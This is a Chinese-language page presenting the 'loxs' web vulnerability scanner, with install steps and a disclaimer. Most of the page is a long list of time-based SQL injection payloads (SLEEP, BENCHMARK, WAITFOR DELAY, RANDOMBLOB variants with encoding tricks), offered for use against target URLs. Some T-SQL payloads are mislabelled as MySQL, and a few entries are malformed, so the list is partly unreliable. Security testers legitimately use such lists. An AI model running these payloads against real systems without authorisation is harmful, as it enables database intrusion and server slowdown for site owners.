loxs 用于扫描SQLi、CRLF、XSS、LFi、OpenRedirect的工具

loxs 用于扫描SQLi、CRLF、XSS、LFi、OpenRedirect的工具

黑客工具

查找 SQLi、CRLF、XSS、LFi、OpenRedirect 的最佳工具.

LOXS

免责声明

Loxs 仅用于教育和道德黑客目的。它只应用于测试您拥有的系统或有明确测试许可的系统。未经同意擅自使用第三方网站或系统是违法和不道德的。

特色

特征关于
LFI Scanner检测本地文件包含漏洞。
OR Scanner识别开放重定向漏洞。
SQL Scanner检测 SQL 注入漏洞。
XSS Scanner识别跨站点脚本漏洞。
CRLF Scanner检测CRLF注入漏洞。
Multi-threaded Scanning通过多线程提高性能。
Customizable Payloads调整有效载荷以适合特定目标。
Success Criteria修改特定用例的成功检测标准。
User-friendly CLI简单直观的命令行界面。
Save Vulnerable URLs选择将易受攻击的 URL 保存到文件中以供将来参考。
HTML Report Generation生成发现的漏洞的详细 HTML 报告。

环境

语言
PythonPython 3.x webdriver_manager selenium aiohttp beautifulsoup4 colorama rich requests gitpython prompt_toolkit pyyaml Flask

安装

克隆存储库

git clone https://github.com/coffinxp/loxs.git
cd loxs

安装requirements

pip3 install -r requirements.txt

运行脚本

python3 loxs.py
loxs 用于扫描SQLi、CRLF、XSS、LFi、OpenRedirect的工具
输入信息
输入 URL/文件(Input URL/File)提供单个 URL 或包含多个 URL 的输入文件以供扫描。
有效负载文件(Payload File)为特定类型的漏洞扫描选择或提供自定义有效负载文件。
成功标准(Success Criteria)定义表示成功利用尝试的模式或字符串。
并发线程(Concurrent Threads)设置多线程扫描的线程数。
查看并保存结果(View and Save Results)在扫描过程中实时显示结果,并保存易受攻击的 URL 以供将来使用。
自定义
Custom Payloads修改或创建针对不同漏洞类型的有效载荷文件以针对特定的应用程序。
Success Criteria调整工具的成功模式以更准确地检测成功的利用。
Concurrent Threads控制扫描期间使用的线程数,以优化性能。

安装Chrome 

wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome-stable_current_amd64.deb
  • 如果安装过程中遇到任何错误,请使用以下命令:
sudo apt -f install
sudo dpkg -i google-chrome-stable_current_amd64.deb

Chrome 驱动程序安装

wget https://storage.googleapis.com/chrome-for-testing-public/128.0.6613.119/linux64/chromedriver-linux64.zip
unzip chromedriver-linux64.zip
cd chromedriver-linux64 
sudo mv chromedriver /usr/bin

payload

通用SQLi

(sleep 10)--
(sleep 10)
(sleep(10))--
(sleep(10))
-sleep(10)
SLEEP(10)#
SLEEP(10)--
SLEEP(10)="
SLEEP(10)='
";sleep 10--
";sleep 10
";sleep(10)--
";sleep(10)
";SELECT SLEEP(10); #
1 SELECT SLEEP(10); #
+ SLEEP(10) + '
&&SLEEP(10)
&&SLEEP(10)--
&&SLEEP(10)#
;sleep 10--
;sleep 10
;sleep(10)--
;sleep(10)
;SELECT SLEEP(10); #
'&&SLEEP(10)&&'1
' SELECT SLEEP(10); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(10)
ORDER BY SLEEP(10)--
ORDER BY SLEEP(10)#
AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
RANDOMBLOB(5000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5000000000/2))))
RANDOMBLOB(10000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2))))

mssql

waitfor delay '00:02'
waitfor delay '00:02' -- 
waitfor delay \'00:02\'
waitfor delay \'00:02\' -- 
%00 waitfor delay '00:02'
%00 waitfor delay '00:02' -- 
%00 waitfor delay \'00:02\'
%00 waitfor delay \'00:02\' -- 
%00' waitfor delay '00:02' -- 
%00';waitfor delay '00:02' -- 
%00;waitfor delay '00:02'
%00;waitfor delay '00:02' -- 
%00;waitfor delay \'00:02\'
%00;waitfor delay \'00:02\' -- 
%00\' waitfor delay \'00:02\' -- 
%00\';waitfor delay \'00:02\' -- 
%00\\' waitfor delay \\'00:02\\' -- 
%00\\';waitfor delay \\'00:02\\' -- 
%0a waitfor delay '00:02'
%0a waitfor delay '00:02' -- 
%0a waitfor delay \'00:02\'
%0a waitfor delay \'00:02\' -- 
%0a' waitfor delay '00:02' -- 
%0a';waitfor delay '00:02' -- 
%0a;waitfor delay '00:02'
%0a;waitfor delay '00:02' -- 
%0a;waitfor delay \'00:02\'
%0a;waitfor delay \'00:02\' -- 
%0a\' waitfor delay \'00:02\' -- 
%0a\';waitfor delay \'00:02\' -- 
%0a\\' waitfor delay \\'00:02\\' -- 
%0a\\';waitfor delay \\'00:02\\' -- 
%0d%0a waitfor delay '00:02'
%0d%0a waitfor delay '00:02' -- 
%0d%0a waitfor delay \'00:02\'
%0d%0a waitfor delay \'00:02\' -- 
%0d%0a' waitfor delay '00:02' -- 
%0d%0a';waitfor delay '00:02' -- 
%0d%0a;waitfor delay '00:02'
%0d%0a;waitfor delay '00:02' -- 
%0d%0a;waitfor delay \'00:02\'
%0d%0a;waitfor delay \'00:02\' -- 
%0d%0a\' waitfor delay \'00:02\' -- 
%0d%0a\';waitfor delay \'00:02\' -- 
%0d%0a\\' waitfor delay \\'00:02\\' -- 
%0d%0a\\';waitfor delay \\'00:02\\' -- 
' waitfor delay '00:02' -- 
';waitfor delay '00:02' -- 
0x00 waitfor delay '00:02'
0x00 waitfor delay '00:02' -- 
0x00 waitfor delay \'00:02\'
0x00 waitfor delay \'00:02\' -- 
0x00' waitfor delay '00:02' -- 
0x00';waitfor delay '00:02' -- 
0x00;waitfor delay '00:02'
0x00;waitfor delay '00:02' -- 
0x00;waitfor delay \'00:02\'
0x00;waitfor delay \'00:02\' -- 
0x00\' waitfor delay \'00:02\' -- 
0x00\';waitfor delay \'00:02\' -- 
0x00\\' waitfor delay \\'00:02\\' -- 
0x00\\';waitfor delay \\'00:02\\' -- 
0x0a waitfor delay '00:02'
0x0a waitfor delay '00:02' -- 
0x0a waitfor delay \'00:02\'
0x0a waitfor delay \'00:02\' -- 
0x0a' waitfor delay '00:02' -- 
0x0a';waitfor delay '00:02' -- 
0x0a;waitfor delay '00:02'
0x0a;waitfor delay '00:02' -- 
0x0a;waitfor delay \'00:02\'
0x0a;waitfor delay \'00:02\' -- 
0x0a\' waitfor delay \'00:02\' -- 
0x0a\';waitfor delay \'00:02\' -- 
0x0a\\' waitfor delay \\'00:02\\' -- 
0x0a\\';waitfor delay \\'00:02\\' -- 
0x0d0a waitfor delay '00:02'
0x0d0a waitfor delay '00:02' -- 
0x0d0a waitfor delay \'00:02\'
0x0d0a waitfor delay \'00:02\' -- 
0x0d0a' waitfor delay '00:02' -- 
0x0d0a';waitfor delay '00:02' -- 
0x0d0a;waitfor delay '00:02'
0x0d0a;waitfor delay '00:02' -- 
0x0d0a;waitfor delay \'00:02\'
0x0d0a;waitfor delay \'00:02\' -- 
0x0d0a\' waitfor delay \'00:02\' -- 
0x0d0a\';waitfor delay \'00:02\' -- 
0x0d0a\\' waitfor delay \\'00:02\\' -- 
0x0d0a\\';waitfor delay \\'00:02\\' -- 
;waitfor delay '00:02'
;waitfor delay '00:02' -- 
;waitfor delay \'00:02\'
;waitfor delay \'00:02\' -- 
\' waitfor delay \'00:02\' -- 
\';waitfor delay \'00:02\' -- 
\\' waitfor delay \\'00:02\\' -- 
\\';waitfor delay \\'00:02\\' -- 
\\n waitfor delay '00:02'
\\n waitfor delay '00:02' -- 
\\n waitfor delay \'00:02\'
\\n waitfor delay \'00:02\' -- 
\\n' waitfor delay '00:02' -- 
\\n';waitfor delay '00:02' -- 
\\n;waitfor delay '00:02'
\\n;waitfor delay '00:02' -- 
\\n;waitfor delay \'00:02\'
\\n;waitfor delay \'00:02\' -- 
\\n\\' waitfor delay \\'00:02\\' -- 
\\n\\';waitfor delay \\'00:02\\' -- 
\\r\\n waitfor delay '00:02'
\\r\\n waitfor delay '00:02' -- 
\\r\\n waitfor delay \'00:02\'
\\r\\n waitfor delay \'00:02\' -- 
\\r\\n' waitfor delay '00:02' -- 
\\r\\n';waitfor delay '00:02' -- 
\\r\\n;waitfor delay '00:02'
\\r\\n;waitfor delay '00:02' -- 
\\r\\n;waitfor delay \'00:02\'
\\r\\n;waitfor delay \'00:02\' -- 
\\r\\n\\' waitfor delay \\'00:02\\' -- 
\\r\\n\\';waitfor delay \\'00:02\\' -- 
\n waitfor delay '00:02'
\n waitfor delay '00:02' -- 
\n waitfor delay \'00:02\'
\n waitfor delay \'00:02\' -- 
\n' waitfor delay '00:02' -- 
\n';waitfor delay '00:02' -- 
\n;waitfor delay '00:02'
\n;waitfor delay '00:02' -- 
\n;waitfor delay \'00:02\'
\n;waitfor delay \'00:02\' -- 
\n\' waitfor delay \'00:02\' -- 
\n\';waitfor delay \'00:02\' -- 
\r\n waitfor delay '00:02'
\r\n waitfor delay '00:02' -- 
\r\n waitfor delay \'00:02\'
\r\n waitfor delay \'00:02\' -- 
\r\n' waitfor delay '00:02' -- 
\r\n';waitfor delay '00:02' -- 
\r\n;waitfor delay '00:02'
\r\n;waitfor delay '00:02' -- 
\r\n;waitfor delay \'00:02\'
\r\n;waitfor delay \'00:02\' -- 
\r\n\' waitfor delay \'00:02\' -- 
\r\n\';waitfor delay \'00:02\' --

mysql

waitfor delay '0:0:10'--
;waitfor delay '0:0:10'--
);waitfor delay '0:0:10'--
';waitfor delay '0:0:10'--
";waitfor delay '0:0:10'--
');waitfor delay '0:0:10'--
");waitfor delay '0:0:10'--
));waitfor delay '0:0:10'--
'));waitfor delay '0:0:10'--
"));waitfor delay '0:0:10'--
") IF (1=1) WAITFOR DELAY '0:0:10'--
';%5waitfor%5delay%5'0:0:10'%5--%5
' WAITFOR DELAY '0:0:10'--
' WAITFOR DELAY '0:0:10'
or WAITFOR DELAY '0:0:10'--
or WAITFOR DELAY '0:0:10'
and WAITFOR DELAY '0:0:10'--
and WAITFOR DELAY '0:0:10'
WAITFOR DELAY '0:0:10'
;WAITFOR DELAY '0:0:10'--
;WAITFOR DELAY '0:0:10'
1 WAITFOR DELAY '0:0:10'--
1 WAITFOR DELAY '0:0:10'
1 WAITFOR DELAY '0:0:10'-- 1337
1' WAITFOR DELAY '0:0:10' AND '1337'='1337
1') WAITFOR DELAY '0:0:10' AND ('1337'='1337
1) WAITFOR DELAY '0:0:10' AND (1337=1337
' WAITFOR DELAY '0:0:10'--
" WAITFOR DELAY '0:0:10'--
')) WAITFOR DELAY '0:0:10'--
'))) WAITFOR DELAY '0:0:10'--
%' WAITFOR DELAY '0:0:10'--
") WAITFOR DELAY '0:0:10'--
")) WAITFOR DELAY '0:0:10'--
"))) WAITFOR DELAY '0:0:10'--
1 waitfor delay '0:0:10'--
1' waitfor delay '0:0:10'--
1 and sleep(10)--
1 and sleep(10)
1 and sleep(10)--
1 and sleep(10)
' and sleep(10)--
' and sleep(10)
' and sleep(10) and '1'='1
' and sleep(10) and '1'='1
' and sleep(10)--
' and sleep(10)
' AnD SLEEP(10) ANd '1
and sleep(10)--
and sleep(10)
and sleep(10)--
and sleep(10)
and SELECT SLEEP(10); #
AnD SLEEP(10)
AnD SLEEP(10)--
AnD SLEEP(10)#
' AND SLEEP(10)#
" AND SLEEP(10)#
') AND SLEEP(10)#
or sleep(10)--
or sleep(10)
or sleep(10)--
or sleep(10)
or SELECT SLEEP(10); #
or SLEEP(10)
or SLEEP(10)#
or SLEEP(10)--
or SLEEP(10)="
or SLEEP(10)='
' OR SLEEP(10)#
" OR SLEEP(10)#
') OR SLEEP(10)#
')) or sleep(10)='
" or sleep(10)#
1) or sleep(10)#
)) or sleep(10)='
1)) or sleep(10)#
or sleep(10)#
%20'sleep%2010'
%20$(sleep%2010)
")) or sleep(10)="
or sleep(10)='
") or sleep(10)="
) or sleep(10)='
1 OR sleep(10)#1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(10)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337RLIKE SLEEP(5)--
' RLIKE SLEEP(10)--
' RLIKE SLEEP(10)-- 1337
" RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10) AND ('1337'='1337
')) RLIKE SLEEP(10) AND (('1337'='1337
'))) RLIKE SLEEP(10) AND ((('1337'='1337
) RLIKE SLEEP(10)-- 1337
) RLIKE SLEEP(10) AND (1337=1337
)) RLIKE SLEEP(10) AND ((1337=1337
))) RLIKE SLEEP(10) AND (((1337=1337
1 RLIKE SLEEP(10)
1 RLIKE SLEEP(10)-- 1337
1 RLIKE SLEEP(10)# 1337
1 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(10))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' RLIKE SLEEP(10) AND '1337'='1337
') RLIKE SLEEP(10) AND ('1337' LIKE '1337
')) RLIKE SLEEP(10) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(10) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(10) AND '1337%'='1337
' RLIKE SLEEP(10) AND '1337' LIKE '1337
") RLIKE SLEEP(10) AND ("1337"="1337
")) RLIKE SLEEP(10) AND (("1337"="1337
"))) RLIKE SLEEP(10) AND ((("1337"="1337
" RLIKE SLEEP(10) AND "1337"="1337
") RLIKE SLEEP(10) AND ("1337" LIKE "1337
")) RLIKE SLEEP(10) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(10) AND ((("1337" LIKE "1337
" RLIKE SLEEP(10) AND "1337" LIKE "1337
' RLIKE SLEEP(10) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' AND ELT(1337=1337,SLEEP(10))--
' AND ELT(1337=1337,SLEEP(10))-- 1337
" AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(10)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(10)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(10)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(10)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(10)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(10))-- 1337
) AND ELT(1337=1337,SLEEP(10)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(10)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(10)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(10))
1 AND ELT(1337=1337,SLEEP(10))-- 1337
1 AND ELT(1337=1337,SLEEP(10))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(10)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))|[1
%' AND ELT(1337=1337,SLEEP(10)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(10)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(10)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(10)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(10)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(10)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(10)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(10)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(10)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(10)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(10)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '134')
 and 1337=(select 1337 from (select sleep(120))A)
 and 1337=(select 1337 from (select sleep(120))A) -- 
 and sleep(120)
 and sleep(120) -- 
 or 1337=(select 1337 from (select sleep(120))A)
 or 1337=(select 1337 from (select sleep(120))A) -- 
 or sleep(120)
 or sleep(120) -- 
%00 and 1337=(select 1337 from (select sleep(120))A)
%00 and 1337=(select 1337 from (select sleep(120))A) -- 
%00 and sleep(120)
%00 and sleep(120) -- 
%00 or 1337=(select 1337 from (select sleep(120))A)
%00 or 1337=(select 1337 from (select sleep(120))A) -- 
%00 or sleep(120)
%00 or sleep(120) -- 
%00' and 1337=(select 1337 from (select sleep(120))A) -- 
%00' and sleep(120) -- 
%00' or 1337=(select 1337 from (select sleep(120))A) -- 
%00' or sleep(120) -- 
%00';select sleep(120) -- 
%00;select sleep(120)
%00;select sleep(120) -- 
%00\' and 1337=(select 1337 from (select sleep(120))A) -- 
%00\' and sleep(120) -- 
%00\' or 1337=(select 1337 from (select sleep(120))A) -- 
%00\' or sleep(120) -- 
%00\';select sleep(120) -- 
%00\\' and 1337=(select 1337 from (select sleep(120))A) -- 
%00\\' and sleep(120) -- 
%00\\' or 1337=(select 1337 from (select sleep(120))A) -- 
%00\\' or sleep(120) -- 
%00\\';select sleep(120) -- 
%00sleep(120)
%00sleep(120) -- 
%0a and 1337=(select 1337 from (select sleep(120))A)
%0a and 1337=(select 1337 from (select sleep(120))A) -- 
%0a and sleep(120)
%0a and sleep(120) -- 
%0a or 1337=(select 1337 from (select sleep(120))A)
%0a or 1337=(select 1337 from (select sleep(120))A) -- 
%0a or sleep(120)
%0a or sleep(120) -- 
%0a' and 1337=(select 1337 from (select sleep(120))A) -- 
%0a' and sleep(120) -- 
%0a' or 1337=(select 1337 from (select sleep(120))A) -- 
%0a' or sleep(120) -- 
%0a';select sleep(120) -- 
%0a;select sleep(120)
%0a;select sleep(120) -- 
%0a\' and 1337=(select 1337 from (select sleep(120))A) -- 
%0a\' and sleep(120) -- 
%0a\' or 1337=(select 1337 from (select sleep(120))A) -- 
%0a\' or sleep(120) -- 
%0a\';select sleep(120) -- 
%0a\\' and 1337=(select 1337 from (select sleep(120))A) -- 
%0a\\' and sleep(120) -- 
%0a\\' or 1337=(select 1337 from (select sleep(120))A) -- 
%0a\\' or sleep(120) -- 
%0a\\';select sleep(120) -- 
%0asleep(120)
%0asleep(120) -- 
%0d%0a and 1337=(select 1337 from (select sleep(120))A)
%0d%0a and 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a and sleep(120)
%0d%0a and sleep(120) -- 
%0d%0a or 1337=(select 1337 from (select sleep(120))A)
%0d%0a or 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a or sleep(120)
%0d%0a or sleep(120) -- 
%0d%0a' and 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a' and sleep(120) -- 
%0d%0a' or 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a' or sleep(120) -- 
%0d%0a';select sleep(120) -- 
%0d%0a;select sleep(120)
%0d%0a;select sleep(120) -- 
%0d%0a\' and 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a\' and sleep(120) -- 
%0d%0a\' or 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a\' or sleep(120) -- 
%0d%0a\';select sleep(120) -- 
%0d%0a\\' and 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a\\' and sleep(120) -- 
%0d%0a\\' or 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a\\' or sleep(120) -- 
%0d%0a\\';select sleep(120) -- 
%0d%0asleep(120)
%0d%0asleep(120) -- 
' and 1337=(select 1337 from (select sleep(120))A) -- 
' and sleep(120) -- 
' or 1337=(select 1337 from (select sleep(120))A) -- 
' or sleep(120) -- 
';select sleep(120) -- 
0x00 and 1337=(select 1337 from (select sleep(120))A)
0x00 and 1337=(select 1337 from (select sleep(120))A) -- 
0x00 and sleep(120)
0x00 and sleep(120) -- 
0x00 or 1337=(select 1337 from (select sleep(120))A)
0x00 or 1337=(select 1337 from (select sleep(120))A) -- 
0x00 or sleep(120)
0x00 or sleep(120) -- 
0x00' and 1337=(select 1337 from (select sleep(120))A) -- 
0x00' and sleep(120) -- 
0x00' or 1337=(select 1337 from (select sleep(120))A) -- 
0x00' or sleep(120) -- 
0x00';select sleep(120) -- 
0x00;select sleep(120)
0x00;select sleep(120) -- 
0x00\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x00\' and sleep(120) -- 
0x00\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x00\' or sleep(120) -- 
0x00\';select sleep(120) -- 
0x00\\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x00\\' and sleep(120) -- 
0x00\\' or 1337=(select 1337 from (select sleep(120))A) -- 
